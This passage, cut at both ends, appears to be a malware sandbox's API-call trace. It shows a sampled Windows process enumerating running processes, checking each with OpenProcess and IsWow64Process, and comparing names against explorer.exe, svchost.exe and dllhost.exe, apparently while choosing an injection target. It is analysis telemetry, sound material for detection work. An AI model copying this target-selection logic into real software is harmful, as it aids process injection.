th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0231.140] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0231.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0231.141] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0231.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0231.141] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0231.142] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0231.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0231.142] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0231.143] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0231.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0231.143] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0231.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0231.144] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0231.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0231.144] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0231.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0231.145] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0231.145] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0231.146] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0231.146] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0231.147] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0231.147] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0231.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0231.148] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0231.148] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0231.149] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0231.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0231.149] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.149] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.149] CloseHandle (hObject=0xec) returned 1 [0231.149] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0231.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0231.150] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0231.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0231.150] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.150] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.150] CloseHandle (hObject=0xec) returned 1 [0231.150] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0231.151] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0231.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0231.151] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0231.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0231.152] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.152] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.152] CloseHandle (hObject=0xec) returned 1 [0231.152] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0231.152] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0231.152] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0231.152] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0231.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0231.152] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.152] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.153] CloseHandle (hObject=0xec) returned 1 [0231.153] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0231.153] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0231.153] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0231.153] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0231.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0231.153] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.153] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.153] CloseHandle (hObject=0xec) returned 1 [0231.153] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0231.153] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0231.153] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0231.153] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0231.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0231.154] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.154] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.154] CloseHandle (hObject=0xec) returned 1 [0231.154] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0231.154] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0231.154] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0231.154] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0231.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0231.155] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.155] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.155] CloseHandle (hObject=0xec) returned 1 [0231.155] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0231.155] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0231.155] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0231.155] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0231.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0231.155] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.155] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.155] CloseHandle (hObject=0xec) returned 1 [0231.155] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0231.155] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0231.156] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0231.156] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0231.156] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0231.156] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.156] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.156] CloseHandle (hObject=0xec) returned 1 [0231.156] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0231.156] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0231.156] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0231.156] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0231.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0231.157] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.157] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.157] CloseHandle (hObject=0xec) returned 1 [0231.157] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0231.157] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0231.157] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0231.157] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0231.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0231.157] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.157] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.157] CloseHandle (hObject=0xec) returned 1 [0231.158] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0231.158] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0231.158] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0231.158] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0231.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0231.158] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.158] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.158] CloseHandle (hObject=0xec) returned 1 [0231.158] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0231.158] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0231.158] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0231.158] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0231.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0231.159] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.159] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.159] CloseHandle (hObject=0xec) returned 1 [0231.159] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0231.159] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0231.159] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0231.159] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0231.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0231.159] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.159] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.160] CloseHandle (hObject=0xec) returned 1 [0231.160] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0231.160] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0231.160] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0231.160] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0231.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0231.160] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.160] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.160] CloseHandle (hObject=0xec) returned 1 [0231.160] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0231.160] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0231.160] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0231.160] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0231.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0231.161] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.161] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.161] CloseHandle (hObject=0xec) returned 1 [0231.161] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0231.161] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0231.161] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0231.161] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0231.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0231.162] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.162] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.162] CloseHandle (hObject=0xec) returned 1 [0231.162] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0231.162] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0231.162] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0231.162] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0231.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0231.162] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.162] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.162] CloseHandle (hObject=0xec) returned 1 [0231.162] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0231.162] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0231.162] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0231.162] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0231.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0231.163] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.163] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.163] CloseHandle (hObject=0xec) returned 1 [0231.163] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0231.163] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0231.163] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0231.163] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0231.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0231.164] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.164] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0231.164] CloseHandle (hObject=0xec) returned 1 [0231.164] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0231.164] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0231.164] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0231.164] Process32Next (in: 